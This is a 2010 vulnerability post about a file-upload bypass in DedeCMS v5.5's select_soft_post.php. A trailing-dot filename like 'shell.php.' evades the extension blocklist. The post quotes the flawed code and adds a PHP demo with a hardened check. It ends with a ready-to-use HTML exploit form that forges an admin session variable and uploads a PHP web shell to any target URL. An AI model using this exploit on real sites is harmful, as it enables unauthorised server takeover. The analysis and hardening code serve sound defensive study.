DEDECMS v5.5 Final select_soft_post.php vulnerability - vulnerability warning - the black bar safety net

2010-03-14T00:00:00
ID MYHACK58:62201026429
Type myhack58
Reporter Anonymous
Modified 2010-03-14T00:00:00

Description

Author: st0p

Today I saw, on Wolves Security Team, the article "DEDECMS v5.5 GBK Final vulnerability" published by the expert toby57; the original address is http://bbs.wolvez.org/topic/125/

I tested it locally. The SESSION-overwrite threat is real but of little use, because it requires session.auto_start = 1; session.auto_start is normally off, so it is only a marginal threat. The later part about keeping a SHELL, however, can be used once you have succeeded in getting into the backend.

Also, session.auto_start is usually used together with session_start(). I checked the documentation: it is only possible when session.auto_start is turned on and session_start() is then called for the first time. I did not look into the specifics of how the SESSION gets overwritten though; alas, really getting to the bottom of it would make my head spin...

I had a look, and in fact both GBK and UTF8 have this problem; I don't know why this expert wrote only GBK in the title...

I had a look at /include/dialog/select_soft_post.php.

The main problem is in the part that handles a manually specified file name (the rename). When our new name is st0p.php. (note the trailing dot after php), the check can be skipped. Look at the code:

```php
// ......
// For a manually specified file name, process it automatically
if(!empty($newname))
{
    $filename = $newname;   // here our new name is st0p.php.
    if(!ereg("\.", $filename)) $fs = explode('.', $uploadfile_name);  // used when $filename contains no '.'
    else $fs = explode('.', $filename);                                // used when $filename contains a '.'
    if(eregi($cfg_not_allowall, $fs[count($fs)-1]))   // $fs[count($fs)-1] is the empty string, so the check is skipped
    {
        ShowMsg("The file name you specified is prohibited by the system!",'javascript:;');
        exit();
    }
    if(!ereg("\.", $filename)) $filename = $filename.'.'.$fs[count($fs)-1];
}
else
{
    $filename = $cuserLogin->getUserID().'-'.dd2char(MyDate('ymdHis',$nowtme));
    $fs = explode('.', $uploadfile_name);
    if(eregi($cfg_not_allowall, $fs[count($fs)-1]))
    {
        ShowMsg("The file you uploaded may contain unsafe elements; the system refuses to operate!",'javascript:;');
        exit();
    }
    $filename = $filename.'.'.$fs[count($fs)-1];
}
$fullfilename = $cfg_basedir.$activepath.'/'.$filename;   // hey hey, the check was skipped and $filename is still st0p.php.
$fullfileurl = $activepath.'/'.$filename;
move_uploaded_file($uploadfile,$fullfilename) or die("Upload file to $fullfilename failed!");
@unlink($uploadfile);
// ......
```
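To make the bypass concrete, here is an added example (written for this page, not DedeCMS code) that reproduces the extension check above on constructed file names and places a hardened version next to it. The value of $cfg_not_allowall is assumed (an unanchored alternation of blocked extensions, which is the shape DedeCMS uses); the allowlist in the hardened version is likewise an assumption. eregi() is gone from modern PHP, so the original check is reproduced with preg_match() and the /i flag, which has the same matching behaviour here.

```php
<?php
// Added example, not DedeCMS code. Reproduces the check from
// /include/dialog/select_soft_post.php on constructed names and contrasts it
// with a hardened check. $cfg_not_allowall is an ASSUMED blocklist; the real
// value is not on the page.
$cfg_not_allowall = "php|pl|cgi|asp|aspx|jsp|php5|php4|php3|shtm|shtml";

// Vulnerable logic, as in the original: split on '.', test only the last
// element against the blocklist. eregi() == case-insensitive, unanchored match.
function vulnerable_name($newname, $uploadfile_name, $cfg_not_allowall) {
    $filename = $newname;
    if (!preg_match('/\./', $filename)) $fs = explode('.', $uploadfile_name);
    else $fs = explode('.', $filename);
    // With a trailing dot, explode() yields '' as the last element and the
    // blocklist regex can never match an empty string -> check skipped.
    if (preg_match('/' . $cfg_not_allowall . '/i', $fs[count($fs) - 1])) {
        return null;   // "system prohibited"
    }
    if (!preg_match('/\./', $filename)) $filename = $filename . '.' . $fs[count($fs) - 1];
    return $filename;
}

// Hardened logic (added here, not DedeCMS's fix): normalise the name to what
// the filesystem will actually create, take exactly one extension, and compare
// it against an allowlist instead of an unanchored blocklist.
function hardened_name($newname, $uploadfile_name) {
    $allowed = ['zip', 'rar', 'gz', 'jpg', 'gif', 'png'];   // ASSUMED allowlist
    $base = ($newname !== '') ? $newname : $uploadfile_name;
    // Windows discards trailing dots and spaces when creating a file, so
    // "st0p.php." is stored as "st0p.php"; strip them before looking at it.
    $base = rtrim($base, ". \t");
    $ext = strtolower(pathinfo($base, PATHINFO_EXTENSION));
    if ($ext === '' || !in_array($ext, $allowed, true)) return null;
    // Keep a single extension: remove every dot (and anything exotic) from
    // the stem so names like shell.php.jpg cannot carry a second extension.
    $stem = preg_replace('/[^A-Za-z0-9_-]/', '', pathinfo($base, PATHINFO_FILENAME));
    if ($stem === '') return null;
    return $stem . '.' . $ext;
}

// Constructed inputs: the page's trailing-dot name plus a few neighbours.
$cases = ['st0p.php', 'st0p.php.', 'shell.php.jpg', 'archive.zip'];
foreach ($cases as $c) {
    printf("%-15s vulnerable=%-18s hardened=%s\n",
        $c,
        var_export(vulnerable_name($c, 'x.zip', $cfg_not_allowall), true),
        var_export(hardened_name($c, 'x.zip'), true));
}
```

Running it shows that st0p.php is rejected by both checks, while st0p.php. slips through the original check unchanged and is rejected by the hardened one (after trimming, its extension is php). The third case, shell.php.jpg, passes the original check because only the last segment is inspected; the hardened version keeps the jpg extension but collapses the stem to shellphp so no second extension survives in the stored name.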

The EXP is as follows:

```html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>DEDECMS v5.5 Final select_soft_post.php EXP</title>
<script type="text/javascript">
function fsubmit(){
    var form = document.forms[0];
    // post the form to <target><path>
    form.action = form.target.value + form.path.value;
    // bkurl: where the uploaded file ends up, with the trailing dot of the new name removed
    var tmpstr = form.target.value + '/' + form.newname.value;
    form.bkurl.value = tmpstr.substr(0, tmpstr.length - 1);
    form.submit();
}
</script>
<style type="text/css">
<!--
body { text-align: center; }
-->
</style>
</head>
<body>
<h3>DEDECMS v5.5 Final select_soft_post.php EXP</h3>
<!-- onsubmit added so that fsubmit() actually sets the action before the post -->
<form action="" method="post" enctype="multipart/form-data" onsubmit="fsubmit(); return false;">
<p>
<input type="hidden" name="_SESSION[dede_admin_id]" value="1" />
<input type="hidden" name="bkurl" value="1" />
<label>Target: <input name="target" type="text" id="target" value="http://target" /> </label>
<label>Path: <input name="path" type="text" id="path" value="/include/dialog/select_soft_post.php" /> </label>
<label>File: <input type="file" name="uploadfile" id="uploadfile" /> </label>
<label>NewName: <input name="newname" type="text" id="newname" value="shell.php." /> </label>
<input type="submit" name="button" id="button" value="Fuck" />
</p>
</form>
</body>
</html>
```